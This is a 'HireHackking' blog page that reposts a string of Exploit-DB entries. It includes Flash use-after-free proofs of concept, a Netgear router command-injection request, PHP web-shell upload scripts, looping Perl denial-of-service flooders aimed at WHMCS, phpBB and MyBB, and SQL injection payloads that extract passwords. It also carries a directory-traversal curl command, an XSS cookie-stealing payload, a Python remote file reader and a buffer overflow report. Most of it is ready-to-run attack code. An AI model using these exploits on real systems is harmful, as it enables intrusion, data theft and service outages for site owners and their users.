Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863280933

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
Source:  https://code.google.com/p/google-security-research/issues/detail?id=576

There is a use-after-free in the TextField.text setter. If the text the field is set to is an object with toString defined, the toString function can free the field's parent object, which is then used. A minimal PoC is as follows:

var mc = this.createEmptyMovieClip("mc", 101);
var tf = mc.createTextField("tf", 102, 1, 1, 100, 100);
tf.text = {toString : func};

function func(){

	mc.removeMovieClip();

        // Fix heap here

	return "natalie";
	
	}

A sample swf and fla are attached.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39053.zip
HireHackking 
Source: https://code.google.com/p/google-security-research/issues/detail?id=574

There is a use-after-free in the TextField.tabIndex setter. If the integer parameter is an object with valueOf defined, then it can free the TextField's parent, leading to a use-after-free. A minimal PoC follows:

var times = 0;
var mc = this.createEmptyMovieClip("mc", 1);
var tf = mc.createTextField("tf", 2, 1, 1, 100, 100);
tf.text = "hello";
tf.tabIndex = {valueOf : func};

function func(){
	if(times == 0){
		times++;
		return;
        }
	mc.removeMovieClip();
	
        // Fix heap here

	return 0x77777777;
	
	}

A sample swf and fla are attached.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39054.zip
HireHackking 
Source: https://code.google.com/p/google-security-research/issues/detail?id=571

There is a use-after-free in MovieClip.attachMovie. If a string parameter has toString defined, a number parameter has valueOf defined or an object parameter has its constructor redefined, it can execute code and free the this object of the method, leading to a use-after-free.

A minimal PoC is as follows:

n ={valueOf : func};

function func(){
	
	_global.mc.removeMovieClip();
        // fix heap here;
  	
   }
this.createEmptyMovieClip("mc", 1);
_global.mc = mc;
mc.attachMovie("myResetButton","newResetButton", n);

A sample swf and fla are attached.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39055.zip
HireHackking 
Source: https://code.google.com/p/google-security-research/issues/detail?id=570

There is a use-after-free issue in MovieClip.localToGlobal. If the Number constructor is overwritten with a new constructor and MovieClip.localToGlobal is called with an integer parameter, the new constructor will get called. If this constructor frees the MovieClip, a use-after-free occurs. A minimal PoC is as follows:

var a = func;
_global.Number = a;
this.createEmptyMovieClip("mc", 1);
mc.localToGlobal( 7 );


function func(){
	
	mc.removeMovieClip();
	
        // fix heap here  

        this.x = 2;
	this.y = 1;
	
	}
	
A sample swf and fla are attached.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39056.zip
HireHackking 
source: https://www.securityfocus.com/bid/65444/info

The Netgear D6300B router is prone to the following security vulnerabilities:

1. Multiple unauthorized-access vulnerabilities
2. A command-injection vulnerability
3. An information disclosure vulnerability

An attacker can exploit these issues to gain access to potentially sensitive information, execute arbitrary commands in the context of the affected device, and perform unauthorized actions. Other attacks are also possible.

Netgear D6300B 1.0.0.14_1.0.14 is vulnerable; other versions may also be affected. 

######## REQUEST: #########
###########################
POST /diag.cgi?id=991220771 HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:22.0) Gecko/20100101 Firefox/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.1/DIAG_diag.htm
Authorization: Basic YWRtaW46cGFzc3dvcmQ=
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 95

ping=Ping&IPAddr1=192&IPAddr2=168&IPAddr3=0&IPAddr4=1;ls&host_name=&ping_IPAddr=192.168.0.1


######## RESPONSE: ########
###########################
HTTP/1.0 200 OK
Content-length: 6672
Content-type: text/html; charset="UTF-8"
Cache-Control:no-cache
Pragma:no-cache

<!DOCTYPE HTML>
<html>
[...]
<textarea name="ping_result" class="num" cols="60" rows="12" wrap="off" readonly>
bin
cferam.001
data
dev
etc
include
lib
linuxrc
mnt
opt

&lt;/textarea&gt;
[...]
HireHackking 
source: https://www.securityfocus.com/bid/65460/info

The Kiddo theme for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to sufficiently sanitize file extensions.

An attacker can exploit this issue to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access to the application; other attacks are also possible. 

<?php
*/
[+] Author: TUNISIAN CYBER
[+] Exploit Title: Kidoo WP Theme File Upload Vulnerability
[+] Date: 05-02-2014
[+] Category: WebApp
[+] Google Dork: :(
[+] Tested on: KaliLinux
[+] Vendor: n/a
[+] Friendly Sites: na3il.com,th3-creative.com

Kiddo WP theme suffers from a File Upload Vulnerability

+PoC:
site/wp-content/themes/kiddo/app/assets/js/uploadify/uploadify.php

+Shell Path:
site/3vil.php

ScreenShot:
http://i.imgur.com/c62cWHH.png

Greets to: XMaX-tn, N43il HacK3r, XtechSEt
Sec4Ever Members:
DamaneDz
UzunDz
GEOIX
E4A Members:
Gastro-DZ

*/

echo "=============================================== \n"; 
echo "   Kiddo WP Theme File Upload Vulnerability\n"; 
echo "                 TUNISIAN CYBER   \n"; 
echo "=============================================== \n\n";   
$uploadfile="cyber.php";
  
$ch = curl_init("site-content/themes/kiddo/app/assets/js/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
  
?>
HireHackking 
/*
source: https://www.securityfocus.com/bid/65470/info

WHMCS is prone to a denial-of-service vulnerability.

Successful exploits may allow attackers to cause denial-of-service condition, denying service to legitimate users.

WHMCS 5.12 is vulnerable; other versions may also be affected. 
*/

#!/usr/bin/perl
#################################
#
#     @@@    @@@@@@@@@@@    @@@@@           @@@@@@@@@@            @@@  @@@@@@@
#     @@@    @@@@@@@@@@@    @@@  @@         @@@     @@            @@@  @@@@@@@@  
#     @@@    @@@            @@@    @@       @@@       @@          @@@  @@@  @@@  
#     @@@    @@@            @@@      @@     @@@     @@            @@@  @@@  @@@  
#     @@@    @@@@@@@@@@@    @@@       @     @@@@@@@@@@            @@@  @@@@@@
#     @@@    @@@@@@@@@@@    @@@     @@      @@@     @@            @@@  @@@@@@
#     @@@    @@@            @@@   @@        @@@       @@   @@@    @@@  @@@ @@@
#     @@@    @@@            @@@ @@          @@@     @@     @@@    @@@  @@@  @@@
#     @@@    @@@@@@@@@@@    @@@@@           @@@@@@@@@@     @@@    @@@  @@@   @@@
#
#####################################
#####################################
#         Iranian Exploit DataBase
# WHMCS Denial of Service Vulnerability
# Test on Whmcs 5.12
# Vendor site : www.whmcs.com
# Code Written By Amir - iedb.team () gmail com - o0_shabgard_0o () yahoo com
# Site : Www.IeDb.Ir/acc   -   Www.IrIsT.Ir
# Fb Page : https://www.facebook.com/iedb.ir
# Greats : Medrik - Bl4ck M4n - ErfanMs - TaK.FaNaR  - F () riD - N20 - Bl4ck N3T - 0x0ptim0us - 0Day
# E2MA3N - l4tr0d3ctism - H-SK33PY - sole sad - r3d_s0urc3 - Dr_Evil - z3r0 - Mr.Zer0 - one alone hacker
# DICTATOR - dr.koderz - E1.Coders - Security - ARTA - ARYABOD - Behnam Vanda - C0dex - Dj.TiniVini
# Det3cT0r - yashar shahinzadeh And All Members In IeDb.Ir/acc
#####################################
use Socket;
if (@ARGV < 2) { &usage }
$rand=rand(10);
$host = $ARGV[0];
$dir = $ARGV[1];
$host =~ s/(http:\/\/)//eg;
for ($i=0; $i<10; $i--)
{
$data = "ajax=1&a=domainoptions&sld=saddddd&tld=saasssssssssss&checktype=owndomain";
$len = length $data;
$foo = "POST ".$dir."cart.php HTTP/1.1\r\n".
"Accept: * /*\r\n".
"Accept-Language: en-gb\r\n".
"Content-Type: application/x-www-form-urlencoded\r\n".
"Accept-Encoding: gzip, deflate\r\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n".
"Host: $host\r\n".
"Content-Length: $len\r\n".
"Connection: Keep-Alive\r\n".
"Cache-Control: no-cache\r\n\r\n".
"$data";
my $port = "80";
my $proto = getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto);
connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo;
send(SOCKET,"$foo", 0);
syswrite STDOUT, "+" ;
}
print "\n\n";
system('ping $host');
sub usage {
print "################################################# \n";
print "##       WHMCS Denial of Service Vulnerability\n";
print "## Discoverd By Amir - iedb.team () gmail com - Id : o0_shabgard_0o \n";
print "##      Www.IeDb.Ir/acc   -   Www.IrIsT.Ir \n";
print "################################################# \n";
print "## [host] [path] \n";
print "## http://host.com /whmcs/\n";
print "################################################# \n";
exit();
};
#####################################
#  Archive Exploit = http://www.iedb.ir/exploits-1300.html
#####################################
HireHackking 
source: https://www.securityfocus.com/bid/65481/info

phpBB is prone to a remote denial-of-service vulnerability.

An attacker can exploit this issue to crash the affected application, denying service to legitimate users.

###########################

# Phpbb Forum Denial of Service Vulnerability

###########################

#!/usr/bin/perl
# Iranian Exploit DataBase
# Phpbb Forum Denial of Service Vulnerability
# Version: All Version
# Vendor site : http://www.phpbb.com
# Code Written By Amir - iedb.team@gmail.com - o0_iedb_0o@yahoo.com
# Site : Www.IeDb.Ir   -   Www.IrIsT.Ir
# Fb Page : 
https://www.facebook.com/pages/Exploit-And-Security-Team-iedbir/199266860256538
# Greats : TaK.FaNaR - ErfanMs - Medrik - F@riD - Bl4ck M4n - 0x0ptim0us 
- 0Day - Dj.TiniVini - E2MA3N 
#  l4tr0d3ctism - H-SK33PY - Noter - r3d_s0urc3 - Dr_Evil And All 
Members In IeDb.Ir/acc
#####################################
use Socket;
if (@ARGV < 2) { &usage }
$rand=rand(10);
$host = $ARGV[0];
$dir = $ARGV[1];
$host =~ s/(http:\/\/)//eg;
for ($i=0; $i<10; $i--)
{
$data = 
"securitytoken=guest&do=process&query=%DB%8C%D8%B3%D8%A8%D9%84%D8%B3%DB%8C%D9%84%D8%B3%DB%8C%D8%A8%D9%84%0%0%0%0%0%0%0%0%0%0&submit.x=0&submit.y=0";
$len = length $data;
$foo = "POST ".$dir."search.php?do=process HTTP/1.1\r\n".
"Accept: * /*\r\n".
"Accept-Language: en-gb\r\n".
"Content-Type: application/x-www-form-urlencoded\r\n".
"Accept-Encoding: gzip, deflate\r\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n".
"Host: $host\r\n".
"Content-Length: $len\r\n".
"Connection: Keep-Alive\r\n".
"Cache-Control: no-cache\r\n\r\n".
"$data";
my $port = "80";
my $proto = getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto);
connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo;
send(SOCKET,"$foo", 0);
syswrite STDOUT, "+" ;
}
print "\n\n";
system('ping $host');
sub usage {
print "\n";
print "################################################# \n";
print "##       Phpbb Forum Denial of Service Vulnerability\n";
print "## Discoverd By Amir - iedb.team@gmail.com - Id : o0_iedb_0o \n";
print "##            Www.IeDb.Ir   -   Www.IrIsT.Ir \n";
print "################################################# \n";
print "## [host] [path] \n";
print "## http://host.com /forum/\n";
print "################################################# \n";
print "\n";
exit();
};
#####################################
#  Archive Exploit = http://www.iedb.ir/exploits-868.html
#####################################

###########################

# Iranian Exploit DataBase = http://IeDb.Ir [2013-11-17]

###########################
HireHackking 
================================================================================
# Beezfud Remote Code Execution
================================================================================
# Vendor Homepage: https://github.com/EVA-01/beezfud
# Date: 23/12/2015
# Software Link: https://github.com/EVA-01/beezfud/archive/master.zip
# Author: Ashiyane Digital Security Team
# Contact: hehsan979@gmail.com
# Source: http://ehsansec.ir/advisories/beezfud-exec.txt
================================================================================
# Vulnerable File : index.php

# PoC :

http://localhost/beezfud/index.php?parameter=;Command;

Vulnerable Parameters : lookback , max , range , latest , earliest


Example :

http://localhost/beezfud/index.php?lookback=;echo '<?php phpinfo();
?>' >info.php;

================================================================================
# Discovered By : Ehsan Hosseini (EhsanSec.ir)
================================================================================
HireHackking 
================================================================================
# Rips Scanner 0.5 - (code.php) Local File Inclusion
================================================================================
# Vendor Homepage: https://github.com/robocoder/rips-scanner
# Date: 24/12/2015
# Software Link: https://github.com/robocoder/rips-scanner/archive/master.zip
# Version : 0.5
# Author: Ashiyane Digital Security Team
# Contact: hehsan979@gmail.com
# Source: http://ehsansec.ir/advisories/rips-code-lfi.txt
================================================================================
# Vulnerable File : code.php

# Vulnerable Code:

	
102	$file = $_GET['file'];
103	$marklines = explode(',', $_GET['lines']);
104	$ext = '.'.pathinfo($file, PATHINFO_EXTENSION);
105
106	
107	if(!empty($file) && is_file($file) && in_array($ext, $FILETYPES))
108	{
109		$lines = file($file);
110		
111		// place line numbers in extra table for more elegant copy/paste
without line numbers
112		echo '<tr><td><table>';
113		for($i=1, $max=count($lines); $i<=$max;$i++)
114			echo "<tr><td class=\"linenrcolumn\"><span
class=\"linenr\">$i</span><A id='".($i+2).'\'></A></td></tr>';
115		echo '</table></td><td id="codeonly"><table id="codetable" width="100%">';
116		
117		$in_comment = false;
118		for($i=0; $i<$max; $i++)
119		{				
120			$in_comment = highlightline($lines[$i], $i+1, $marklines, $in_comment);
121		}
122	} else
123	{
124		echo '<tr><td>Invalid file specified.</td></tr>';
125	}


# PoC :

http://localhost/rips/windows/code.php?file=/var/www/html/index.php

Vulnerable Parameter : file

================================================================================
# Discovered By : Ehsan Hosseini (EhsanSec.ir)
================================================================================
HireHackking 
source: https://www.securityfocus.com/bid/65545/info

MyBB is prone to a remote denial-of-service vulnerability.

An attacker can exploit this issue to crash the affected application, denying service to legitimate users.

MyBB 1.6.12 is vulnerable; other versions may be also be affected. 



# Mybb All Version Denial of Service Vulnerability

#!/usr/bin/perl

# Iranian Exploit DataBase
# Mybb All Version Denial of Service Vulnerability
# Test on Mybb 1.6.12
# Vendor site : www.mybb.com
# Code Written By Amir - iedb.team () gmail com - o0_shabgard_0o () 
yahoo com
# Site : Www.IeDb.Ir/acc   -   Www.IrIsT.Ir
# Fb Page : https://www.facebook.com/iedb.ir
# Greats : Medrik - Bl4ck M4n - ErfanMs - TaK.FaNaR  - F () riD - N20 - 
Bl4ck N3T - 0x0ptim0us - 0Day
# E2MA3N - l4tr0d3ctism - H-SK33PY - sole sad - r3d_s0urc3 - Dr_Evil - 
z3r0 - Mr.Zer0 - one alone hacker
# DICTATOR - dr.koderz - E1.Coders - Security - ARTA - ARYABOD - Behnam 
Vanda - C0dex - Dj.TiniVini
# Det3cT0r - yashar shahinzadeh And All Members In IeDb.Ir/acc
#####################################
use Socket;
if (@ARGV < 2) { &usage }
$rand=rand(10);
$host = $ARGV[0];
$dir = $ARGV[1];
$host =~ s/(http:\/\/)//eg;
for ($i=0; $i<10; $i--)
{
$data = 
"forums%5B%5D=all&version=rss2.0&limit=1500000&make=%D8%AF%D8%B1%DB%8C%D8%A7%D9%81%D8%AA+%D9%84%DB%8C%D9%86%DA%A9+%D9%BE%DB%8C%D9%88%D9%86%D8%AF+%D8%B3%D8%A7%DB%8C%D8%AA%DB%8C";
$len = length $data;
$foo = "POST ".$dir."misc.php?action=syndication HTTP/1.1\r\n".
"Accept: * /*\r\n".
"Accept-Language: en-gb\r\n".
"Content-Type: application/x-www-form-urlencoded\r\n".
"Accept-Encoding: gzip, deflate\r\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n".
"Host: $host\r\n".
"Content-Length: $len\r\n".
"Connection: Keep-Alive\r\n".
"Cache-Control: no-cache\r\n\r\n".
"$data";
my $port = "80";
my $proto = getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto);
connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo;
send(SOCKET,"$foo", 0);
syswrite STDOUT, "+" ;
}
print "\n\n";
system('ping $host');
sub usage {
print "################################################# \n";
print "##       Mybb All Version Denial of Service Vulnerability\n";
print "## Discoverd By Amir - iedb.team () gmail com - Id : 
o0_shabgard_0o \n";
print "##      Www.IeDb.Ir/acc   -   Www.IrIsT.Ir \n";
print "################################################# \n";
print "## [host] [path] \n";
print "## http://host.com /mybb/\n";
print "################################################# \n";
exit();
};
#####################################
#  Archive Exploit = http://www.iedb.ir/exploits-1332.html
#####################################

###########################

# Iranian Exploit DataBase = http://IeDb.Ir [2014-02-12]

###########################
HireHackking 
source: https://www.securityfocus.com/bid/65557/info

i-doit Pro is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

i-doit Pro 1.2.4 and prior are vulnerable. 

http://www.example.com/?objID=[SQL Injection]
HireHackking 
source: https://www.securityfocus.com/bid/65587/info

Red Hat Piranha is prone to a remote security bypass vulnerability.

An attacker can exploit this issue to gain unauthorized access to the restricted pages of the application, this may lead to further attacks.

Red Hat Piranha 0.8.6 is vulnerable; other versions may also be affected. 

curl -d'' -I http://www.example.com:3636/secure/control.php 
wget -qO- --post-data='' http://www.example.com3636/secure/control.php
HireHackking 
source: https://www.securityfocus.com/bid/65606/info

Wire Immogest component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

http://www.example.com/index.php?option=com_wire_immogest&view=object&id=[SQL Injection]
HireHackking 
source: https://www.securityfocus.com/bid/65628/info

Rhino is prone to a cross-site scripting vulnerability and security-bypass vulnerability .

An attacker can exploit these issues to execute arbitrary script code in the context of the vulnerable site, potentially allowing the attacker to steal cookie-based authentication credentials, bypass security restrictions to obtain sensitive information, or perform unauthorized actions. Other attacks may also be possible.

Rhino 4.1 is vulnerable; other versions may also be affected. 

==========================
PoC-Exploit
==========================

// Non-Persistent XSS  with "callback" Parameter in
/include/proactive_cross.php

(1) Under "callback" set your GET Parameter Callback to
"><script>alert(document.cookie)</script>

The Non-Persistent XSS will be executed for the Administrator in the
browser (he directly logged in because you chatting with him)

// Remote Change Password - with "Forgot.php"

http://[target]/rhino/operator/index.php?p=forgot

(1) in the forgot file there's no condition if the user logged in or not,
so we can look deeply in the file in line (27-67)

if ($_SERVER["REQUEST_METHOD"] == 'POST' && isset($_POST['newP'])) {
    $defaults = $_POST;

    $femail = filter_var($_POST['f_email'], FILTER_SANITIZE_EMAIL);
    $pass = $_POST['f_pass'];
    $newpass = $_POST['f_newpass'];

    if ($pass != $newpass) {
        $errors['e1'] = $tl['error']['e10'];
    } elseif (strlen($pass) <= '5') {
        $errors['e1'] = $tl['error']['e11'];
    }

    if ($defaults['f_email'] == '' || !filter_var($defaults['f_email'],
FILTER_VALIDATE_EMAIL)) {
        $errors['e'] = $tl['error']['e3'];
    }

    $fwhen = 0;

    $user_check = $lsuserlogin->lsForgotpassword($femail, $fwhen);
    if ($user_check == true && count($errors) == 0) {

    // The new password encrypt with hash_hmac
    $passcrypt = hash_hmac('sha256', $pass, DB_PASS_HASH);

    $result2 = $lsdb->query('UPDATE '.DB_PREFIX.'user SET password =
"'.$passcrypt.'", forgot = 0 WHERE email = "'.smartsql($femail).'"');

    $result = $lsdb->query('SELECT username FROM '.DB_PREFIX.'user WHERE
email = "'.smartsql($femail).'" LIMIT 1');
    $row = $result->fetch_assoc();

    if (!$result) {
        ls_redirect(JAK_PARSE_ERROR);
    } else {
        $lsuserlogin->lsLogin($row['username'], $pass, 0);
        ls_redirect(BASE_URL);
    }

    } else {
        $errorsf = $errors;
    }
}

So there is an MySQL Query to execute if the email in the database (Show up
the change password settings).

ALL YOU HAVE TO DO IS DISCOVER THE E-MAIL ADDRESS THAT PUTTED WHEN ADMIN
INSTALLED THE SCRIPT.
HireHackking 
source: https://www.securityfocus.com/bid/65637/info

The NextGEN Gallery plugin for WordPress is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.

Exploiting this issue can allow an attacker to obtain sensitive information that could aid in further attacks.

NextGEN Gallery 2.0.0 is vulnerable; other versions may also be affected. 

curl -i -d 'dir=/etc/' http://www.example.com/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/nextgen_addgallery_page/static/jquery.filetree/connectors/jqueryFileTree.php
HireHackking 
source: https://www.securityfocus.com/bid/65646/info

MODx Evogallery module is prone to an arbitrary file upload vulnerability.

An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application. 

<?php
$uploadfile="file.php"; 
$ch = curl_init("demo.ltd/assets/modules/evogallery/js/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);   
curl_setopt($ch, CURLOPT_POSTFIELDS,       
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
HireHackking 
#!/usr/bin/python -w
# Title : EasyCafe Server <= 2.2.14 Remote File Read
# Date : 25/12/2015
# Author : R-73eN
# Tested on : Windows 7 Ultimate
# Software Link : http://www.tinasoft.com/easycafe/
# Download Link: http://www.tinasoft.com/Download/easysetup.exe
# Vulnerable Versions : EasyCafe Server <= 2.2.14
# EasyCafe Server has a feature to upload file from the server to a client.
# And the request is as following. EasyCafe Server sends an UDP request to the client with the file that wants to upload,
# Then the client receives the packet and connects to the server on port 831 and sends the directory of the file and receives it.
# The problem is that a remote attacker can connect to port 831 and can retrive a file becuase the server doesn't validate the request,
# and does not check if it has sent the UDP request which gives us full Read access to the system.
#
#EDB Note: Code my need some adjusting

import socket
#Banner
banner = ""
banner += "  ___        __        ____                 _    _  \n" 
banner +=" |_ _|_ __  / _| ___  / ___| ___ _ __      / \  | |    \n"
banner +="  | || '_ \| |_ / _ \| |  _ / _ \ '_ \    / _ \ | |    \n"
banner +="  | || | | |  _| (_) | |_| |  __/ | | |  / ___ \| |___ \n"
banner +=" |___|_| |_|_|  \___/ \____|\___|_| |_| /_/   \_\_____|\n\n"
print banner



IP = "192.168.43.36" # Target IP
PORT = 831
file_to_read = "C:\\Windows\\System32\\drivers\\etc\\hosts" # File to read



s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((IP, PORT))
file_to_read = "\x43" + file_to_read
hex_value = ''.join(x.encode('hex') for x in file_to_read)
fill = "\x00"
end = "\x01\x00\x00\x00\x01"
payload = hex_value.decode("hex") + fill * (261 - len(end) - len(file_to_read)) + end
s.send(payload)
s.settimeout(0)
print "[+] Request Send Waiting for Response . . . [+]"

try:
	data = s.recv(261) # Get header
	while data:
		data = s.recv(2048)
		print data
		
except Exception:
	print "[+] https://www.infogen.al/ [+]"
finally:			
	s.close()
HireHackking 
[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:
http://hyp3rlinx.altervista.org/advisories/ACCESSDIVER-BUFFER-OVERFLOW.txt



Vendor:
==============
M. Jean Fages
www.accessdiver.com
circa 1998-2006


Product:
=============================
AccessDiver V4.301 build 5888


AccessDiver is a security tester for Web pages. It has got a set of tools
which
will verify the robustness of you accounts and directories. You will know
if your
customers, your users and you can use safely your web site.


Vulnerability Type:
===================
Buffer Overflow



CVE Reference:
==============
N/A



Vulnerability Details:
=====================

AccessDiver is vulnerable to multiple buffer overflows, two vectors are
described below.

1) buffer overflow @ 2073 bytes in URL field for Server / IP address and
will overwrite NSEH and SEH exception handlers.

EAX 00000000
ECX 52525252
EDX 7C9037D8 ntdll.7C9037D8
EBX 00000000
ESP 0012EA08
EBP 0012EA28
ESI 00000000
EDI 00000000
EIP 52525252                 <----------------- BOOM
C 0  ES 0023 32bit 0(FFFFFFFF)
P 1  CS 001B 32bit 0(FFFFFFFF)
A 0  SS 0023 32bit 0(FFFFFFFF)
Z 1  DS 0023 32bit 0(FFFFFFFF)
S 0  FS 003B 32bit 7FFDF000(FFF)
T 0  GS 0000 NULL
D 0
O 0  LastErr ERROR_SUCCESS (00000000)
EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE)
ST0 empty
ST1 empty
ST2 empty
ST3 empty
ST4 empty
ST5 empty
ST6 empty
ST7 empty
               3 2 1 0      E S P U O Z D I
FST 4000  Cond 1 0 0 0  Err 0 0 0 0 0 0 0 0  (EQ)
FCW 1272  Prec NEAR,53  Mask    1 1 0 0 1 0



2) Buffer overflow  when loading a malicious "Exploit zone file" text file
containing 2080 bytes,
load text file from "Weak History" Menu choose Import "from File" choose
exploit text file and BOOM!


EAX 00000000
ECX 52525242
EDX 7702B4AD ntdll.7702B4AD
EBX 00000000
ESP 0018E940
EBP 0018E960
ESI 00000000
EDI 00000000
EIP 52525242                      <----------------- KABOOM
C 0  ES 002B 32bit 0(FFFFFFFF)
P 1  CS 0023 32bit 0(FFFFFFFF)
A 0  SS 002B 32bit 0(FFFFFFFF)
Z 1  DS 002B 32bit 0(FFFFFFFF)
S 0  FS 0053 32bit 7EFDD000(FFF)
T 0  GS 002B 32bit 0(FFFFFFFF)
D 0
O 0  LastErr ERROR_SUCCESS (00000000)
EFL 00210246 (NO,NB,E,BE,NS,PE,GE,LE)
ST0 empty g
ST1 empty g
ST2 empty g
ST3 empty g
ST4 empty g
ST5 empty g
ST6 empty g
ST7 empty g
               3 2 1 0      E S P U O Z D I
FST 4000  Cond 1 0 0 0  Err 0 0 0 0 0 0 0 0  (EQ)
FCW 1372  Prec NEAR,64  Mask    1 1 0 0 1 0


Windbg dump...

(2abc.2330): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=52525252 edx=7702b4ad esi=00000000
edi=00000000
eip=52525252 esp=0018e7f4 ebp=0018e814 iopl=0         nv up ei pl zr na pe
nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b
efl=00010246
52525252 ??              ???



Disclosure Timeline:
=====================================
Vendor Notification:  NA
December 26, 2015 : Public Disclosure




Exploitation Technique:
=======================
Local



Severity Level:
================
Med



===========================================================

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.

by hyp3rlinx
HireHackking 
source: https://www.securityfocus.com/bid/65029/info

Dell Kace 1000 Systems Management Appliance is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.

Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Dell Kace 1000 Systems Management Appliance 5.4.76847 is vulnerable; other versions may also be affected. 

Proof of Concept
Page: /service/kbot_service.php
Web method: getUploadPath
Parameter: macAddress
PoC: Variations of the statement within in the HTTP request below introduce invalid SQL syntax resulting in a database error.
POST /service/kbot_service.php HTTP/1.1
Accept-Encoding: gzip,deflate
Host: www.example.com
SOAPAction: "urn:#getUploadPath"
Content-Length: 543

<soapenv:Envelope xmlns:xsi="http://www.example.org/2001/XMLSchema-instance" xmlns:xsd="http://www.example.org/2001/XMLSchema" xmlns:soapenv="http://example.xmlsoap.org/soap/envelope/" xmlns:urn="urn:kbot_service.wsdl">
   <soapenv:Header/>
   <soapenv:Body>
      <urn:getUploadPath soapenv:encodingStyle= "http://example.xmlsoap.org/soap/encoding/">
         <macAddress xsi:type="xsd:string">' or '1'='1</macAddress>
         <filename xsi:type="xsd:string">test</filename>
      </urn:getUploadPath>
   </soapenv:Body>
</soapenv:Envelope>
Page: /service/kbot_service.php
Web method: getKBot
Parameter: macAddress
PoC: Variations of the statement within in the HTTP request below introduce invalid SQL syntax resulting in a database error.
POST /service/kbot_service.php HTTP/1.1
Accept-Encoding: gzip,deflate
Host: www.example.com
Content-Type: text/xml;charset=UTF-8
SOAPAction: "urn:#getKBot"
Content-Length: 553

<soapenv:Envelope xmlns:xsi="http://www.example.org/2001/XMLSchema-instance" xmlns:xsd="http://www.example.org/2001/XMLSchema" xmlns:soapenv="http://example.xmlsoap.org/soap/envelope/" xmlns:urn="urn:kbot_service.wsdl">
   <soapenv:Header/>
   <soapenv:Body>
      <urn:getKBotConfig soapenv:encodingStyle="http://example.xmlsoap.org/soap/encoding/">
         <macAddress xsi:type="xsd:string">' or (select ascii(substring(PASSWORD,1,1)) from USER limit 2,1) = 101 and ''='</macAddress>
      </urn:getKBotConfig>
   </soapenv:Body>
</soapenv:Envelope>
The following pages also appear to be affected by similar SQL injection weaknesses, however require authentication:
Page: /userui/advisory_detail.php
PoC: http://www.example.com/userui/advisory_detail.php?ID=9-2
Notes: Requires Authentication
Page: /userui/ticket_list.php?SEARCH_SELECTION=any&ORDER[]=ID
Parameter: ORDER[]
Notes: Requires Authentication
Page: /userui/ticket.php?ID=86
Parameter: ID
Notes: Requires Authentication
HireHackking 
source: https://www.securityfocus.com/bid/65059/info

Imageview is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.

An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.

Imageview 6.x are vulnerable; other versions may also be affected. 

http://www.example.com/photos/upload.php
http://www.example.com/Galerie/upload.php
HireHackking 
source: https://www.securityfocus.com/bid/65121/info

